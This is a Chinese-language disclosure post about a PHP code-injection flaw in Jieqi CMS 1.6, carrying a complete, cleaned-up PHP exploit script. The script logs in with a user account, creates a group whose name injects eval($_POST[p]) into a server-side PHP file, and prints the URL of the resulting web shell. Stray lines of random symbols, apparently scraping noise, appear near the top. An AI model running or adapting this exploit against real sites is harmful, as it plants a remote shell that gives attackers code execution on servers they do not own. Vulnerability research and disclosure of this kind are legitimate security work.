杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
8 X7 f/ E9 v) T* S* ?+ w) A0 @, _( `$ T; S3 d+ B( `& p2 m# y
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞(PHP 代码注入,见下方利用程序),应该有2年多历史了。
前提:需要一个有权创建圈子(group)的用户账号,即该漏洞需登录后才能利用。
. ^( ^2 x2 k% S4 k# {
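<?php
/**
 * Jieqi CMS V1.6 PHP code injection PoC (a 2008-era public exploit).
 *
 * Original by flyh4t (phpsec at hotmail dot com, team http://www.wolvez.org).
 * This revision only fixes defects in the script itself; the technique, the
 * request parameters and the payload are unchanged.
 *
 * What the script does:
 *   1. POSTs the given credentials to login.php and keeps the session cookies
 *      in a cookie jar.
 *   2. POSTs to modules/group/create.php with a group name (gname) that
 *      contains PHP code. The file the script then points at,
 *      files/group/userdir/0/<id>/info.php, indicates that gname evidently
 *      ends up in a PHP file without escaping, so the leading quote closes
 *      the string and eval($_POST[p]) is executed.
 *   3. Reads the new group id back from the response ("g=<id>") and prints
 *      the URL of the written file.
 *
 * Needs only the curl extension; works regardless of php.ini settings.
 * Requires an account that is allowed to create a group.
 * Historical PoC -- run only against systems you are authorised to test.
 */

print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

// Four positional arguments are required. The original usage text listed
// only three (and misspelt "username") although this check demands four.
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path username password
host: target server (ip/hostname)
path: path to jieqicms
username: a username who can create group
password: the password of that user
Example:
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit(1);
}

error_reporting(E_ERROR | E_WARNING | E_PARSE);   // same mask as the original error_reporting(7)
ini_set('max_execution_time', 0);

$host     = $argv[1];
$path     = $argv[2];
$username = $argv[3];
$password = $argv[4];

// Build one base URL without doubled slashes. The original concatenated
// "http://$host/$path/..." and relied on the server tolerating "//".
$base = rtrim('http://' . $host . '/' . trim($path, '/'), '/');

// Keep the session cookie in a private temp file rather than ./cookie.txt,
// so the target's session id is not left behind in the working directory.
$cookie_jar = tempnam(sys_get_temp_dir(), 'jieqi');
if ($cookie_jar === false) {
    exit("could not create a cookie jar file\n");
}

/**
 * POST $postfields to $url, reading and writing session cookies in $cookie_jar.
 *
 * @param string       $url        absolute URL to POST to
 * @param string|array $postfields urlencoded string, or an array (cURL then
 *                                 sends it as multipart/form-data)
 * @param string       $cookie_jar cookie file shared by both requests
 * @return string|false            response body, or false after printing the
 *                                 cURL error to stderr
 */
function jieqi_post($url, $postfields, $cookie_jar)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
    // Return the body instead of echoing it; the original captured it with
    // ob_start()/ob_get_contents() and never closed the buffer.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);

    $body = curl_exec($ch);
    if ($body === false) {
        // The original called curl_error($ch) on an undefined $ch here, so the
        // error text was always empty.
        fwrite(STDERR, "cURL Error: " . curl_error($ch) . "\n");
    }
    curl_close($ch);
    return $body;
}

/* step 1: log in and collect the session cookie */
// Credentials are urlencoded (the original interpolated them raw, so a
// username or password containing '&', '=', '+' or '%' broke the request).
// The submit value is the form's button label, kept byte-for-byte: HTML
// entities plus what appear to be GBK-encoded characters.
$login = 'password=' . urlencode($password)
       . '&username=' . urlencode($username)
       . '&usecookie=86400'
       . '&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B'
       . '&action=login&jumpreferer=1';
if (jieqi_post("$base/login.php", $login, $cookie_jar) === false) {
    unlink($cookie_jar);
    exit('exploit failed');
}
// NOTE: a rejected login is not detected at this point -- the login page's
// response format is not known to this script. It surfaces in step 3 as a
// response without a "g=<id>" parameter.

/* step 2: create a group whose name carries the payload */
// gname value is  ';eval($_POST[p]);//flyh4t  -- the quote closes the string
// it is written into, eval() runs whatever is POSTed as "p", and "//" comments
// out the rest of that line. The other three fields match the original
// hand-built multipart body (all set to "1"). None of the values starts with
// '@', so the old cURL "@file" upload syntax cannot trigger.
$fields = array(
    'gname'  => '\';eval($_POST[p]);//flyh4t',
    'gcatid' => '1',
    'gaudit' => '1',
    'gbrief' => '1',
);
$resp = jieqi_post("$base/modules/group/create.php", $fields, $cookie_jar);
unlink($cookie_jar);
if ($resp === false) {
    exit('exploit failed');
}

/* step 3: the new group id is echoed back as "g=<id>" */
// The original matched [0-9]{1,4} and then used $shell[1] without checking
// the match, printing a URL with an empty id when creation had failed.
if (!preg_match('/g=([0-9]+)/', $resp, $m)) {
    exit("exploit failed: no group id in the response (login or group creation refused?)\n");
}
$url = "$base/files/group/userdir/0/$m[1]/info.php";
echo "view you shell here(password:p)\r\n";
echo $url;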